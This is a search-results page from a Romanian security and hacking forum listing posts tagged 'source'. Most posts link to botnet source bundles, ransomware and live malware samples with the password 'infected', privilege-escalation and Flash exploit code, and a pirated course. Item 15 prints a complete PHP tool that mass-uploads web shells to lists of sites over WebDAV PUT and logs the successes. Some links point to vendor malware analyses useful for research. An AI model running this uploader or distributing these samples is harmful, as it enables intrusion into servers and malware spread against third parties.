Jump to content

Search the Community

Showing results for tags 'source'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. O mica colectie de boti pentru voi. Bot Bundle 1 - ( includes over 150 bots with source code and moded versions): OSMDB-BOTNET-PACK-1.zip - Speedy Share - upload your files here Bot Bundle 2 - ( 155 bots): OSMDB-BOTNET-PACK-2.zip - Speedy Share - upload your files here Bot Bundle 3 - ( 53 bots and ransomware ): OSMDB-BOTNET-PACK-3.zip - Speedy Share - upload your files here Bot Bundle 4 - ( urxbot, Spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot, jbot, microbot, blueeyebot, icebot, q8bot, happybot,): OSMDB-BOTNET-PACK-4.zip - Speedy Share - upload your files here
  2. Threat Spotlight: Rombertik – Gazing Past the Smoke, Mirrors, and Trapdoors Download standard pass Download infected Source
  3. leak source: How I Make $6,000+ a Month Making Apps Without Coding! - Thieves-Team udemy: https://www.udemy.com/creating-profitable-ios-and-android-apps-without-code/ download: GirlShare - Download creating-profitable-ios-and-android-apps-without-code.rar
  4. source : NASA: We Are Going to Europa
  5. Why MariaDB Replication? source : Setup MariaDB Master-Slave Replication In CentOS 7
  6. source : https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes
  7. Dau contul steam pe un key de counter-strike source! Contul e din 7 august 2012.
  8. Dissecting the Linux/Moose malware http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf ( PDF ) Download Source
  9. https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Nivdor-A/detailed-analysis.aspx Infection vector via fake download. https://www.virustotal.com/en/url/3017aa5a0039f5eca181f56f69a29cb178eb621c0884b0380c4284a720ff7e1f/analysis/1432720854/ https://malwr.com/analysis/YzJjMjJiNDRiNWU0NDc2ODg5MzA4ODk0MWFiOGFlOWQ/ ThreatExpert Report https://www.virustotal.com/en/file/2f24ef96a1ed3ca05632f221ff17e8412728bc50b4f7c30a78528f89319b198b/analysis/1432718970/ Download infected Source
  10. Meet ‘Tox': Ransomware for the Rest of Us ~ https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us https://www.virustotal.com/en/file/f1384ff19a870f5aa718486666a14e88873d79eaea5725e3a2097b2d9fd9a320/analysis/1432628218/ hxxp://toxicola7qwv37qj.onion/downloads/ransom_50.00_dol_df410f19157f591860e1633b85dfb50b.scr https://malwr.com/analysis/MWExODFmZjM5YjZlNDQ5ODkxYzBkOTk1ZmMzOTcyYzI/ ThreatExpert Report https://blockchain.info/en/address/1KKGLjfDpVtNXymtTkU3PiiCpkJ532cLko Download Pass: infected Source
  11. Download here is a sample of W2KM_BARTALEX.VVRA this MSoffice file when executed download UPATRE and DYRE also attached https://www.virustotal.com/en/file/25da9335c1e791a39895bcebe6bff322e9bff5f91e53cf36383d1f223a7752d1/analysis/ and here are the download files Download TROJ_UPATRE.VVRA.zip Download TSPY_DYRE.VVRA.zip Source
  12. Win32k Elevation of Privilege Vulnerability. Allows code to be executed in kernel mode. Used by malware to target Windows 7. Apply MS15-051 for fix. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://github.com/hfiref0x/CVE-2015-1701 Download pass: exploit Source
  13. UNDERSTANDING WINDOWS 2K SOURCES (part 1) Windows NT source code
  14. Infect files on removable disks and remote network drives. Description Virus:Win32/Ursnif VT: https://www.virustotal.com/en/file/8fa8122cfa52d7ff7fd8d918ccc9089a1762420c23edb6c50e8573456bfcdde3/analysis/1430975102/ https://www.virustotal.com/en/file/9bd91d207911b08489079c3927478b824b7948b741e1b6221339893581e4e9cb/analysis/1430976279/ Download Malware Pass: infected Source
  15. <?php /* Author: @AdeRoot\n\n"; echo " // WebDav Exploit\n\n"; if($argc == 1) { echo "Help parameter: | -h--help\n"; exit(1); } function help() { echo "Options[+]:\n\n"; echo "Dominio: | -d--dominio\n"; echo "Lista: | -l--lista\n"; echo "Thread: | -t--thread\n"; echo "File: | -f--file\n"; echo "Create: | -c--create\n\n"; echo "Single:\n\n"; echo "Usage: php webdav.php -d xxx -f xxx -c xxx\n"; echo "Example: php webdav.php -d [url]www.example.com[/url] -f /path/shell.asp -c shell.asp\n\n"; echo "Lista:\n\n"; echo "Usage: php webdav.php -l xxx -t xxx -f xxx -c xxx\n"; echo "Example: php webdav.php -l lista.txt -t 10 -f /path/shell.asp -c shell.asp\n\n"; } error_reporting(0); set_time_limit(0); $opts = getopt("hd:f:l:t:c:"); foreach(array_keys($opts) as $opt) switch($opt) { case "h": help(); break; case "d": $site = $opts["d"]; $file = $opts["f"]; $create = $opts["c"]; post($site); break; case "l": $site = array_filter(explode("\n",file_get_contents($opts["l"]))); $thread = $opts["t"]; $file = $opts["f"]; $create = $opts["c"]; thread($site,$thread,$file,$create); break; } function thread($site,$thread,$file,$create) { $out = 0; $thr = $thread; $ini = 0; $fin = $thr - 1; while(1){ $childs = array(); for ($count = $ini; $count <= $fin; $count++){ if(empty($site[$count])){ $out = 1; continue; } $pid = pcntl_fork(); if ( $pid == -1 ) { echo "Fork error\n"; exit(1); } else if ($pid) { array_push($childs, $pid); } else { post($site[$count]); exit(0); } } foreach($childs as $key => $pid){ pcntl_waitpid($pid, $status); } if($out == 1){ exit(0); } $ini = $fin + 1; $fin = $fin + $thr; } } function post($site) { global $file, $create; $filesize = filesize($file); $fp = fopen($file, "r"); if(preg_match("@http://@", $site)) { $site = $site; } else { $site = "http://".$site; } $site = $site."/".$create; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $site); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0"); curl_setopt($ch, CURLOPT_PUT, true); curl_setopt($ch, CURLOPT_INFILE, $fp); curl_setopt($ch, CURLOPT_INFILESIZE, $filesize); $exec = curl_exec($ch); echo $site."=>"; $result = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if($result == 200 || $result == 201) { echo "Created Successfully\n\n"; file_put_contents("wbshells.txt", $site."\n", FILE_APPEND); } else { echo "Failed\n\n"; } } if(isset($opts["f"]) and ($opts["c"])) { echo "End!\n\n"; } else if (!isset($opts["h"])){ echo "Option invalid or missing set more options\n\n"; } ?> Source
  16. mentioned in a nytimes article that schneier linked to. Two samples (prod + dev), for OSX and Win32. Does anti-vm, has some keylogging support, etc. Can't seem to attach, so here's a zippyshare link. Zippyshare.com Pass: infected https://www.virustotal.com/en/file/b27d29f30ecac80e15993fd1ba670bdcfc60f986e60d54e6a0cfb10f1c27bbc9/analysis/1430392133/ https://www.virustotal.com/en/file/48b36cedebe6d883f43b83e677449fc684f1eda4f8d63ab4eaaa3d4877389b85/analysis/1430392219/ Source
  17. Reports by Eset: Unboxing Linux/Mumblehard: Muttering spam from your servers http://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf Download Source
  18. Project Description Tera Term is Tera Term Pro 2.3 succession version and is being officially recognized by the original author. Tera Term is open source free software terminal emulator supporting UTF-8 protocol. Now TTSSH supports SSH2 protocol (Original version supports SSH1). B?ie?a?i de la CISCO îl mai folosesc Deci cu progr?melu te conectezi la ce vrea mu?chiule?ul t?u , ssh , telnet etc.. Source: Tera Term Open Source Project Download: Download Files List - Tera Term - SourceForge.JP //:Edit: Version 4.86
  19. Some sort of Middle Eastern APT apparently. Volatile Cedar - Analysis of a Global Cyber Espionage Campaign | Check Point Blog Sinkholing Volatile Cedar DGA Infrastructure - Securelist Attached: 034e4c62965f8d5dd5d5a2ce34a53ba9 08c988d6cebdd55f3b123f2d9d5507a6 184320a057e455555e3be22e67663722 1d4b0fc476b7d20f1ef590bcaa78dc5d 1dcac3178a1b85d5179ce75eace04d10 22872f40f5aad3354bbf641fe90f2fd6 2783cee3aac144175fef308fc768ea63 29eca6286a01c0b684f7d5f0bfe0c0e6 2b9106e8df3aa98c3654a4e0733d83e7 306d243745ba53d09353b3b722d471b8 3f35c97e9e87472030b84ae1bc932ffc 44b5a3af895f31e22f6bc4eb66bd3eb7 4f8b989bc424a39649805b5b93318295 5b505d0286378efcca4df38ed4a26c90 5ca3ac2949022e5c77335f7e228db1d8 5d437eb2a22ec8f37139788f2087d45d 61b11b9e6baae4f764722a808119ed0c 66e2adf710261e925db588b5fac98ad8 6f11a67803e1299a22c77c8e24072b82 7031426fb851e93965a72902842b7c2c 740c47c663f5205365ae9fb08adfb127 7cd87c4976f1b34a0b060a23faddbd19 7dbc46559efafe8ec8446b836129598c 826b772c81f41505f96fc18e666b1acd 96b1221ba725f1aaeaaa63f63cf04092 981234d969a4c5e6edea50df009efedd 9a5a99def615966ea05e3067057d6b37 ab3d0c748ced69557f78b7071879e50a c19e91a91a2fa55e869c42a70da9a506 c7ac6193245b76cc8cebc2835ee13532 c898aed0ab4173cc3ac7d4849d06e7fa c9a4317f1002fefcc7a250c3d76d4b01 d2074d6273f41c34e8ba370aa9af46ad e6f874b7629b11a2f5ed3cc2c123f8b6 ea53e618432ca0c823fafc06dc60b726 eb7042ad32f41c0e577b5b504c7558ea edaca6fb1896a120237b2ce13f6bc3e6 f58f03121eed899290ed70f4d19af307 Download Source
  20. Diaphora, a program diffing plugin for IDA (by joxeankoret) https://github.com/joxeankoret/diaphora Source
  21. Modular Everything in the browser is a module, a web-app running in its own process. Construct your own browsing experience by selecting the right modules for you. Hackable Want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS! Every behavior is programmatic and exposed through APIs. Open source The entire technology stack is open source. Modify existing modules and you can create your own to extend the behavior of Breach. Getting Involved Homepage: Breach - A new modular Browser Mailing list: breach-dev@googlegroups.com IRC Channel: #breach on Freenode You can find a list of Modules available or under developement here: List of Modules Runing Breach on Linux See instructions here: Running Breach on Linux Link: https://github.com/breach/breach_core/ Source: TF
  22. Source: https://github.com/SecurityObscurity/cve-2015-0313 PoC: http://www.exploit-db.com/sploits/36491.zip Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit Reference: Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements Malware don't need Coffee: CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits https://helpx.adobe.com/security/products/flash-player/apsa15-02.html Source: http://www.exploit-db.com/exploits/36491/
  23. Hello, and some more of this bad stuff. Download infected Source
  24. Some more of cryptolocker copycats DOWNLOAD Pass: infected Source
×
×
  • Create New...